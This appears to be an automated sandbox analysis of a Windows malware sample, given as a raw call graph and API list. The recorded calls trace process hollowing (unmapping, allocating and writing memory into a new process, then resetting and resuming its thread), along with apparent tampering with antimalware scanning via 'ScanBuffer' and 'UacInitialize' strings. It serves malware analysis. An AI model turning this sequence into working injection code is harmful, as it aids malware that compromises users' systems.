RegSetValueExA RegCloseKey 31693->31694 31695 27ef5a1 31694->31695 31696 27d4500 11 API calls 31695->31696 31697 27ef5ae 31696->31697 31698 27d44dc 11 API calls 
31697->31698 31699 27ef5b6 31698->31699 31699->30885 31705 27ef3ad 31700->31705 31701 27ef3d9 31702 27d44dc 11 API calls 31701->31702 31704 27ef3ee 31702->31704 31704->31143 31705->31701 32172 27d46c4 11 API calls 31705->32172 32173 27d4530 11 API calls 31705->32173 31708 27d49a0 31707->31708 31709 27d7e66 GetFileAttributesA 31708->31709 31710 27d7e71 31709->31710 31710->31209 31710->31210 31712 27edf96 31711->31712 32174 27d4f20 31712->32174 31714 27edf9e 31715 27edfbe RtlDosPathNameToNtPathName_U 31714->31715 32178 27eded0 31715->32178 31717 27edfda NtCreateFile 31718 27ee005 31717->31718 31719 27d49f8 11 API calls 31718->31719 31720 27ee017 NtWriteFile NtClose 31719->31720 31721 27ee041 31720->31721 32179 27d4c60 31721->32179 31724 27d44dc 11 API calls 31725 27ee051 31724->31725 31725->31209 31727 27d49ac 31726->31727 31728 27d45a0 11 API calls 31727->31728 31730 27d49e7 31727->31730 31729 27d49c3 31728->31729 31729->31730 31731 27d2c2c 11 API calls 31729->31731 31732 27e8c28 31730->31732 31731->31730 31733 27e8c30 31732->31733 31734 27d4860 11 API calls 31733->31734 31735 27e8c73 31734->31735 31736 27d47ec 11 API calls 31735->31736 31737 27e8c98 31736->31737 31738 27e889c 22 API calls 31737->31738 31739 27e8cb3 31738->31739 31740 27d4860 11 API calls 31739->31740 31741 27e8ccc 31740->31741 31742 27d47ec 11 API calls 31741->31742 31743 27e8cf1 31742->31743 31744 27e889c 22 API calls 31743->31744 31745 27e8d0c 31744->31745 31746 27ea76f 31745->31746 31747 27d4860 11 API calls 31745->31747 31748 27d4500 11 API calls 31746->31748 31751 27e8d3d 31747->31751 31749 27ea78c 31748->31749 31750 27d4500 11 API calls 31749->31750 31752 27ea79c 31750->31752 31754 27d47ec 11 API calls 31751->31754 31753 27d4c60 SysFreeString 31752->31753 31755 27ea7a7 31753->31755 31759 27e8d62 31754->31759 31756 27d4500 11 API calls 31755->31756 31757 27ea7b7 31756->31757 31758 27d44dc 11 API calls 31757->31758 31760 27ea7bf 31758->31760 31762 27e889c 22 API calls 31759->31762 31761 27d4500 
11 API calls 31760->31761 31763 27ea7cc 31761->31763 31765 27e8d7d 31762->31765 31764 27d4500 11 API calls 31763->31764 31766 27ea7d9 31764->31766 31767 27d4860 11 API calls 31765->31767 31766->31053 31768 27e8d96 31767->31768 31769 27d47ec 11 API calls 31768->31769 31770 27e8dbb 31769->31770 31771 27e889c 22 API calls 31770->31771 31772 27e8dd6 31771->31772 31772->31746 31773 27d4860 11 API calls 31772->31773 31774 27e8e1e 31773->31774 31775 27d47ec 11 API calls 31774->31775 31776 27e8e43 31775->31776 31777 27e889c 22 API calls 31776->31777 31778 27e8e5e 31777->31778 31779 27d4860 11 API calls 31778->31779 31780 27e8e77 31779->31780 31781 27d47ec 11 API calls 31780->31781 31782 27e8e9c 31781->31782 31783 27e889c 22 API calls 31782->31783 31784 27e8eb7 31783->31784 31785 27d4860 11 API calls 31784->31785 31786 27e8efc 31785->31786 31787 27d47ec 11 API calls 31786->31787 31788 27e8f21 31787->31788 31789 27e889c 22 API calls 31788->31789 31790 27e8f3c 31789->31790 31791 27d4860 11 API calls 31790->31791 31792 27e8f55 31791->31792 31793 27d47ec 11 API calls 31792->31793 31794 27e8f7d 31793->31794 31795 27e889c 22 API calls 31794->31795 31796 27e8f9b 31795->31796 31797 27d4860 11 API calls 31796->31797 31798 27e8fb7 31797->31798 31799 27d47ec 11 API calls 31798->31799 31800 27e8fe8 31799->31800 31801 27e889c 22 API calls 31800->31801 31802 27e900c 31801->31802 31803 27d4860 11 API calls 31802->31803 31804 27e9028 31803->31804 31805 27d47ec 11 API calls 31804->31805 31806 27e9059 31805->31806 31807 27e889c 22 API calls 31806->31807 31808 27e907d 31807->31808 31809 27d4860 11 API calls 31808->31809 31810 27e9099 31809->31810 31811 27d47ec 11 API calls 31810->31811 31812 27e90ca 31811->31812 31813 27e889c 22 API calls 31812->31813 31814 27e90ee 31813->31814 32182 27e8654 31814->32182 31817 27e91a0 31818 27d4860 11 API calls 31817->31818 31820 27e91bc 31818->31820 31819 27d4860 11 API calls 31821 27e914b 31819->31821 31823 27d47ec 11 API calls 31820->31823 31822 27d47ec 11 
API calls 31821->31822 31825 27e917c 31822->31825 31824 27e91ed 31823->31824 31826 27e889c 22 API calls 31824->31826 31827 27e889c 22 API calls 31825->31827 31828 27e9211 31826->31828 31827->31817 31829 27e889c 22 API calls 31828->31829 31830 27e9244 31829->31830 31831 27d4860 11 API calls 31830->31831 31832 27e9260 31831->31832 31833 27d47ec 11 API calls 31832->31833 31834 27e9291 31833->31834 31835 27e889c 22 API calls 31834->31835 31836 27e92b5 31835->31836 31837 27d4860 11 API calls 31836->31837 31838 27e92d1 31837->31838 31839 27d47ec 11 API calls 31838->31839 31840 27e9302 31839->31840 31841 27e889c 22 API calls 31840->31841 31842 27e9326 31841->31842 31843 27d2ee0 2 API calls 31842->31843 31844 27e932b 31843->31844 31845 27d4860 11 API calls 31844->31845 31846 27e936e 31845->31846 31847 27d47ec 11 API calls 31846->31847 31848 27e939f 31847->31848 31849 27e889c 22 API calls 31848->31849 31850 27e93c3 31849->31850 31851 27d4860 11 API calls 31850->31851 31852 27e93df 31851->31852 31853 27d47ec 11 API calls 31852->31853 31854 27e9410 31853->31854 31855 27e889c 22 API calls 31854->31855 31856 27e9434 31855->31856 31857 27d4860 11 API calls 31856->31857 31858 27e9450 31857->31858 31859 27d47ec 11 API calls 31858->31859 31860 27e9481 31859->31860 31861 27e889c 22 API calls 31860->31861 31862 27e94a5 GetThreadContext 31861->31862 31862->31746 31863 27e94c7 31862->31863 31864 27d4860 11 API calls 31863->31864 31865 27e94e3 31864->31865 31866 27d47ec 11 API calls 31865->31866 31867 27e9514 31866->31867 31868 27e889c 22 API calls 31867->31868 31869 27e9538 31868->31869 31870 27d4860 11 API calls 31869->31870 31871 27e9554 31870->31871 31872 27d47ec 11 API calls 31871->31872 31873 27e9585 31872->31873 31874 27e889c 22 API calls 31873->31874 31875 27e95a9 31874->31875 31876 27d4860 11 API calls 31875->31876 31877 27e95c5 31876->31877 31878 27d47ec 11 API calls 31877->31878 31879 27e95f6 31878->31879 31880 27e889c 22 API calls 31879->31880 31881 27e961a 31880->31881 
31882 27d4860 11 API calls 31881->31882 31883 27e9636 31882->31883 31884 27d47ec 11 API calls 31883->31884 31885 27e9667 31884->31885 31886 27e889c 22 API calls 31885->31886 31887 27e968b 31886->31887 31888 27d4860 11 API calls 31887->31888 31889 27e96a7 31888->31889 31890 27d47ec 11 API calls 31889->31890 31891 27e96d8 31890->31891 31892 27e889c 22 API calls 31891->31892 31893 27e96fc 31892->31893 32194 27e82cc 31893->32194 31896 27e9a37 31899 27d4860 11 API calls 31896->31899 31897 27e9730 31898 27d4860 11 API calls 31897->31898 31901 27e974c 31898->31901 31900 27e9a53 31899->31900 31902 27d47ec 11 API calls 31900->31902 31903 27d47ec 11 API calls 31901->31903 31904 27e9a84 31902->31904 31905 27e977d 31903->31905 31906 27e889c 22 API calls 31904->31906 31907 27e889c 22 API calls 31905->31907 31973 27e9a30 31906->31973 31908 27e97a1 31907->31908 31910 27d4860 11 API calls 31908->31910 31909 27d4860 11 API calls 31912 27e9ac4 31909->31912 31911 27e97bd 31910->31911 31914 27d47ec 11 API calls 31911->31914 31913 27d47ec 11 API calls 31912->31913 31915 27e9af5 31913->31915 31916 27e97ee 31914->31916 31917 27e889c 22 API calls 31915->31917 31918 27e889c 22 API calls 31916->31918 31919 27e9b19 31917->31919 31920 27e9812 31918->31920 31921 27d4860 11 API calls 31919->31921 31922 27d4860 11 API calls 31920->31922 31924 27e9b35 31921->31924 31923 27e982e 31922->31923 31925 27d47ec 11 API calls 31923->31925 31926 27d47ec 11 API calls 31924->31926 31928 27e985f 31925->31928 31927 27e9b66 31926->31927 31929 27e889c 22 API calls 31927->31929 31930 27e889c 22 API calls 31928->31930 31931 27e9b8a 31929->31931 31932 27e9883 31930->31932 31933 27d4860 11 API calls 31931->31933 32208 27e853c 31932->32208 31939 27e9ba6 31933->31939 31936 27e989b 31940 27e7a2c 18 API calls 31936->31940 31937 27e98c3 31938 27d4860 11 API calls 31937->31938 31944 27e98df 31938->31944 31942 27d47ec 11 API calls 31939->31942 31941 27e98bc 31940->31941 31943 27d4860 11 API calls 31941->31943 31946 27e9bd7 
31942->31946 31947 27e9950 31943->31947 31945 27d47ec 11 API calls 31944->31945 31951 27e9910 31945->31951 31948 27e889c 22 API calls 31946->31948 31949 27d47ec 11 API calls 31947->31949 31950 27e9bfb 31948->31950 31955 27e9981 31949->31955 31952 27e7a2c 18 API calls 31950->31952 31954 27e889c 22 API calls 31951->31954 31953 27e9c1c 31952->31953 31953->31746 31956 27d4860 11 API calls 31953->31956 31954->31941 31957 27e889c 22 API calls 31955->31957 31960 27e9c4a 31956->31960 31958 27e99a5 31957->31958 31959 27d4860 11 API calls 31958->31959 31962 27e99c1 31959->31962 31961 27d47ec 11 API calls 31960->31961 31964 27e9c7b 31961->31964 31963 27d47ec 11 API calls 31962->31963 31967 27e99f2 31963->31967 31965 27e889c 22 API calls 31964->31965 31966 27e9c9f 31965->31966 31968 27d4860 11 API calls 31966->31968 31969 27e889c 22 API calls 31967->31969 31972 27e9cbb 31968->31972 31970 27e9a16 31969->31970 32222 27e7a2c 31970->32222 31974 27d47ec 11 API calls 31972->31974 31973->31909 31975 27e9cec 31974->31975 31976 27e889c 22 API calls 31975->31976 31977 27e9d10 31976->31977 32236 27e8b38 31977->32236 31979 27d4860 11 API calls 31981 27e9d97 31979->31981 31980 27e9d17 31980->31979 31982 27d47ec 11 API calls 31981->31982 31983 27e9dc8 31982->31983 31984 27e889c 22 API calls 31983->31984 31985 27e9dec 31984->31985 31986 27d4860 11 API calls 31985->31986 31987 27e9e08 31986->31987 31988 27d47ec 11 API calls 31987->31988 31989 27e9e39 31988->31989 31990 27e889c 22 API calls 31989->31990 31991 27e9e5d 31990->31991 31992 27d4860 11 API calls 31991->31992 31993 27e9e79 31992->31993 31994 27d47ec 11 API calls 31993->31994 31995 27e9eaa 31994->31995 31996 27e889c 22 API calls 31995->31996 31997 27e9ece 31996->31997 31998 27e7d78 18 API calls 31997->31998 31999 27e9eeb 31998->31999 32000 27d4860 11 API calls 31999->32000 32001 27e9f07 32000->32001 32002 27d47ec 11 API calls 32001->32002 32003 27e9f38 32002->32003 32004 27e889c 22 API calls 32003->32004 32005 27e9f5c 32004->32005 
32006 27d4860 11 API calls 32005->32006 32007 27e9f78 32006->32007 32008 27d47ec 11 API calls 32007->32008 32009 27e9fa9 32008->32009 32010 27e889c 22 API calls 32009->32010 32011 27e9fcd 32010->32011 32012 27d4860 11 API calls 32011->32012 32013 27e9fe9 32012->32013 32014 27d47ec 11 API calls 32013->32014 32015 27ea01a 32014->32015 32016 27e889c 22 API calls 32015->32016 32017 27ea03e 32016->32017 32018 27e7d78 18 API calls 32017->32018 32019 27ea05e 32018->32019 32020 27d4860 11 API calls 32019->32020 32021 27ea07a 32020->32021 32022 27d47ec 11 API calls 32021->32022 32023 27ea0ab 32022->32023 32024 27e889c 22 API calls 32023->32024 32025 27ea0cf 32024->32025 32026 27d4860 11 API calls 32025->32026 32027 27ea0eb 32026->32027 32028 27d47ec 11 API calls 32027->32028 32029 27ea11c 32028->32029 32030 27e889c 22 API calls 32029->32030 32031 27ea140 32030->32031 32032 27d4860 11 API calls 32031->32032 32033 27ea15c 32032->32033 32034 27d47ec 11 API calls 32033->32034 32035 27ea18d 32034->32035 32036 27e889c 22 API calls 32035->32036 32037 27ea1b1 SetThreadContext NtResumeThread 32036->32037 32038 27d4860 11 API calls 32037->32038 32039 27ea1fd 32038->32039 32040 27d47ec 11 API calls 32039->32040 32041 27ea22e 32040->32041 32042 27e889c 22 API calls 32041->32042 32043 27ea252 32042->32043 32044 27d4860 11 API calls 32043->32044 32045 27ea26e 32044->32045 32046 27d47ec 11 API calls 32045->32046 32047 27ea29f 32046->32047 32048 27e889c 22 API calls 32047->32048 32049 27ea2c3 32048->32049 32050 27d4860 11 API calls 32049->32050 32051 27ea2df 32050->32051 32052 27d47ec 11 API calls 32051->32052 32053 27ea310 32052->32053 32054 27e889c 22 API calls 32053->32054 32055 27ea334 32054->32055 32056 27d4860 11 API calls 32055->32056 32057 27ea350 32056->32057 32058 27d47ec 11 API calls 32057->32058 32059 27ea381 32058->32059 32060 27e889c 22 API calls 32059->32060 32061 27ea3a5 32060->32061 32062 27d2c2c 11 API calls 32061->32062 32063 27ea3b4 32062->32063 32064 27d4860 11 API 
calls 32063->32064 32065 27ea3d6 32064->32065 32066 27d47ec 11 API calls 32065->32066 32067 27ea407 32066->32067 32068 27e889c 22 API calls 32067->32068 32069 27ea42b 32068->32069 32070 27e8818 21 API calls 32069->32070 32071 27ea43f 32070->32071 32072 27e8818 21 API calls 32071->32072 32073 27ea453 32072->32073 32074 27e8818 21 API calls 32073->32074 32075 27ea467 32074->32075 32076 27d4860 11 API calls 32075->32076 32077 27ea483 32076->32077 32078 27d47ec 11 API calls 32077->32078 32079 27ea4b4 32078->32079 32080 27e889c 22 API calls 32079->32080 32081 27ea4d8 32080->32081 32082 27e8818 21 API calls 32081->32082 32083 27ea4ec 32082->32083 32084 27e8818 21 API calls 32083->32084 32085 27ea500 32084->32085 32086 27d4860 11 API calls 32085->32086 32087 27ea51c 32086->32087 32088 27d47ec 11 API calls 32087->32088 32089 27ea53a 32088->32089 32090 27e8818 21 API calls 32089->32090 32091 27ea552 32090->32091 32092 27d4860 11 API calls 32091->32092 32093 27ea56e 32092->32093 32094 27d47ec 11 API calls 32093->32094 32095 27ea58c 32094->32095 32096 27e8818 21 API calls 32095->32096 32097 27ea5a4 32096->32097 32098 27e8818 21 API calls 32097->32098 32099 27ea5b8 32098->32099 32100 27e8818 21 API calls 32099->32100 32101 27ea5cc 32100->32101 32102 27e8818 21 API calls 32101->32102 32103 27ea5e0 32102->32103 32104 27e8818 21 API calls 32103->32104 32105 27ea5f4 32104->32105 32106 27d4860 11 API calls 32105->32106 32107 27ea610 32106->32107 32108 27d47ec 11 API calls 32107->32108 32109 27ea62e 32108->32109 32110 27e8818 21 API calls 32109->32110 32111 27ea646 32110->32111 32112 27d4860 11 API calls 32111->32112 32113 27ea662 32112->32113 32114 27d47ec 11 API calls 32113->32114 32115 27ea680 32114->32115 32116 27e8818 21 API calls 32115->32116 32117 27ea698 32116->32117 32118 27d4860 11 API calls 32117->32118 32119 27ea6b4 32118->32119 32120 27d47ec 11 API calls 32119->32120 32121 27ea6d2 32120->32121 32122 27e8818 21 API calls 32121->32122 32123 27ea6ea 32122->32123 32124 
27d4860 11 API calls 32123->32124 32125 27ea706 32124->32125 32126 27d47ec 11 API calls 32125->32126 32127 27ea724 32126->32127 32128 27e8818 21 API calls 32127->32128 32129 27ea73c 32128->32129 32130 27e8818 21 API calls 32129->32130 32131 27ea75b 32130->32131 32132 27e8818 21 API calls 32131->32132 32132->31746 32134 27d4530 11 API calls 32133->32134 32135 27e8227 32134->32135 32136 27d4860 11 API calls 32135->32136 32137 27e8246 32136->32137 32138 27e8098 17 API calls 32137->32138 32139 27e8259 32138->32139 32140 27e8140 15 API calls 32139->32140 32141 27e825f FlushInstructionCache 32140->32141 32142 27e8285 32141->32142 32143 27d44dc 11 API calls 32142->32143 32144 27e828d 32143->32144 32144->31647 32146 27d4530 11 API calls 32145->32146 32147 27e84ab 32146->32147 32148 27d4860 11 API calls 32147->32148 32149 27e84ca 32148->32149 32150 27e8098 17 API calls 32149->32150 32151 27e84dd 32150->32151 32152 27e8140 15 API calls 32151->32152 32153 27e84e3 WinExec 32152->32153 32154 27e8505 32153->32154 32155 27d44dc 11 API calls 32154->32155 32156 27e850d 32155->32156 32156->30982 32157->31042 32158->31199 32159->31255 32160->31372 32161->31205 32162->31299 32164 27e883f GetProcAddress 32163->32164 32165 27e8887 32163->32165 32166 27e887c FreeLibrary 32164->32166 32167 27e8859 32164->32167 32165->31495 32166->32165 32168 27e7d78 18 API calls 32167->32168 32169 27e8871 32168->32169 32169->32166 32171 27d49a4 GetModuleHandleA 32170->32171 32171->31670 32172->31705 32173->31705 32175 27d4f26 SysAllocStringLen 32174->32175 32176 27d4f3c 32174->32176 32175->32176 32177 27d4c30 32175->32177 32176->31714 32177->32174 32178->31717 32180 27d4c74 32179->32180 32181 27d4c66 SysFreeString 32179->32181 32180->31724 32181->32180 32183 27d4530 11 API calls 32182->32183 32184 27e8677 32183->32184 32185 27d4860 11 API calls 32184->32185 32186 27e8696 32185->32186 32187 27e8098 17 API calls 32186->32187 32188 27e86a9 32187->32188 32189 27e8140 15 API calls 32188->32189 32190 27e86af 
CreateProcessAsUserW 32189->32190 32191 27e86f3 32190->32191 32192 27d44dc 11 API calls 32191->32192 32193 27e86fb 32192->32193 32193->31817 32193->31819 32195 27d4530 11 API calls 32194->32195 32196 27e82f1 32195->32196 32197 27e798c 12 API calls 32196->32197 32198 27e82fe 32197->32198 32199 27d47ec 11 API calls 32198->32199 32200 27e830b 32199->32200 32201 27e8098 17 API calls 32200->32201 32202 27e831e 32201->32202 32203 27e8140 15 API calls 32202->32203 32204 27e8324 NtReadVirtualMemory 32203->32204 32205 27e8352 32204->32205 32206 27d4500 11 API calls 32205->32206 32207 27e835f 32206->32207 32207->31896 32207->31897 32209 27d4530 11 API calls 32208->32209 32210 27e8561 32209->32210 32211 27e798c 12 API calls 32210->32211 32212 27e856e 32211->32212 32213 27d47ec 11 API calls 32212->32213 32214 27e857b 32213->32214 32215 27e8098 17 API calls 32214->32215 32216 27e858e 32215->32216 32217 27e8140 15 API calls 32216->32217 32218 27e8594 NtUnmapViewOfSection 32217->32218 32219 27e85b4 32218->32219 32220 27d4500 11 API calls 32219->32220 32221 27e85c1 32220->32221 32221->31936 32221->31937 32223 27d4530 11 API calls 32222->32223 32224 27e7a51 32223->32224 32225 27e798c 12 API calls 32224->32225 32226 27e7a5e 32225->32226 32227 27d47ec 11 API calls 32226->32227 32228 27e7a6b 32227->32228 32229 27e8098 17 API calls 32228->32229 32230 27e7a7e 32229->32230 32231 27e8140 15 API calls 32230->32231 32232 27e7a84 NtAllocateVirtualMemory 32231->32232 32233 27e7ab5 32232->32233 32234 27d4500 11 API calls 32233->32234 32235 27e7ac2 32234->32235 32235->31973 32237 27d2c10 11 API calls 32236->32237 32238 27e8b6e 32237->32238 32238->31980 32239 27f4134 32240 27d4860 11 API calls 32239->32240 32241 27f4155 32240->32241 32242 27f4160 32241->32242 32243 27d47ec 11 API calls 32242->32243 32244 27f418c 32243->32244 32245 27d49a0 32244->32245 32246 27f4197 32245->32246 32247 27e889c 22 API calls 32246->32247 32248 27f41b0 32247->32248 32249 27d4860 11 API calls 32248->32249 32250 
27f41ef 32249->32250 32251 27f41fa 32250->32251 32252 27d4860 11 API calls 32251->32252 32253 27f4227 32252->32253 32254 27d49a0 32253->32254 32255 27f4232 32254->32255 32256 27f423f 32255->32256 32257 27d47ec 11 API calls 32256->32257 32258 27f425e 32257->32258 32259 27d49a0 32258->32259 32260 27f4269 32259->32260 32261 27f4276 32260->32261 32262 27e889c 22 API calls 32261->32262 32263 27f4282 32262->32263 32264 27d4860 11 API calls 32263->32264 32265 27f42a3 32264->32265 32266 27f42ae 32265->32266 32267 27f42bb 32266->32267 32268 27d47ec 11 API calls 32267->32268 32269 27f42da 32268->32269 32270 27d49a0 32269->32270 32271 27f42e5 32270->32271 32272 27f42f2 32271->32272 32273 27e889c 22 API calls 32272->32273 32274 27f42fe 32273->32274 32275 27d4860 11 API calls 32274->32275 32276 27f431f 32275->32276 32277 27f432a 32276->32277 32278 27f4337 32277->32278 32279 27d47ec 11 API calls 32278->32279 32280 27f4356 32279->32280 32281 27d49a0 32280->32281 32282 27f4361 32281->32282 32283 27f436e 32282->32283 32284 27e889c 22 API calls 32283->32284 32285 27f437a 32284->32285 32286 27d7e5c GetFileAttributesA 32285->32286 32287 27f4384 32286->32287 32288 27f4388 32287->32288 32289 27f43e3 32287->32289 33782 27ee64c 32288->33782 32290 27d4860 11 API calls 32289->32290 32292 27f4404 32290->32292 32294 27f440f 32292->32294 32293 27f439d 33787 27d4764 32293->33787 32297 27f441c 32294->32297 32298 27d47ec 11 API calls 32297->32298 32299 27f443b 32298->32299 32301 27f4446 32299->32301 33789 27d46d4 32301->33789 33783 27d4bcc 11 API calls 33782->33783 33784 27ee664 33783->33784 33785 27ee685 33784->33785 33786 27d49f8 11 API calls 33784->33786 33785->32293 33786->33784 33788 27d476a 33787->33788 33788->33788 33790 27d46da 33789->33790

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 6027 27e8c28-27e8c2b 6028 27e8c30-27e8c35 6027->6028 6028->6028 6029 27e8c37-27e8d1e call 27d4990 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6028->6029 6060 27ea76f-27ea7d9 call 27d4500 * 2 call 27d4c60 call 27d4500 call 27d44dc call 27d4500 * 2 6029->6060 6061 27e8d24-27e8dff call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6029->6061 6061->6060 6105 27e8e05-27e912d call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d30d4 * 2 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4de0 call 27d4df0 call 27e8654 6061->6105 6214 27e912f-27e919b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6105->6214 6215 27e91a0-27e94c1 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d2ee0 call 27d2f08 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 
27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c GetThreadContext 6105->6215 6214->6215 6215->6060 6323 27e94c7-27e972a call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e82cc 6215->6323 6396 27e9a37-27e9aa3 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6323->6396 6397 27e9730-27e9899 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e853c 6323->6397 6424 27e9aa8-27e9c28 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7a2c 6396->6424 6487 27e989b-27e98c1 call 27e7a2c 6397->6487 6488 27e98c3-27e992f call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6397->6488 6424->6060 6528 27e9c2e-27e9d27 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8b38 6424->6528 6497 27e9934-27e9a2b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 
27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7a2c 6487->6497 6488->6497 6567 27e9a30-27e9a35 6497->6567 6579 27e9d7b-27ea4d3 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7d78 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7d78 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c SetThreadContext NtResumeThread call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d2c2c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8818 * 3 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6528->6579 6580 27e9d29-27e9d76 call 27e8a30 call 27e8a24 6528->6580 6567->6424 6805 27ea4d8-27ea76a call 27e8818 * 2 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 * 5 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 
call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27e7f4c call 27e8818 * 2 6579->6805 6580->6579 6805->6060
                                                                                        APIs
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                          • Part of subcall function 027E8654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027E86E0
                                                                                        • GetThreadContext.KERNEL32(000005FC,0282B420,ScanString,0282B3A4,027EA7F4,UacInitialize,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,UacInitialize,0282B3A4), ref: 027E94BA
                                                                                          • Part of subcall function 027E82CC: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E833D
                                                                                          • Part of subcall function 027E853C: NtUnmapViewOfSection.NTDLL(?,?), ref: 027E85A1
                                                                                          • Part of subcall function 027E7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027E7A9F
                                                                                          • Part of subcall function 027E7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E7DEC
                                                                                        • SetThreadContext.KERNEL32(000005FC,0282B420,ScanBuffer,0282B3A4,027EA7F4,ScanString,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,000008AC,00203FF8,0282B4F8,00000004,0282B4FC), ref: 027EA1CF
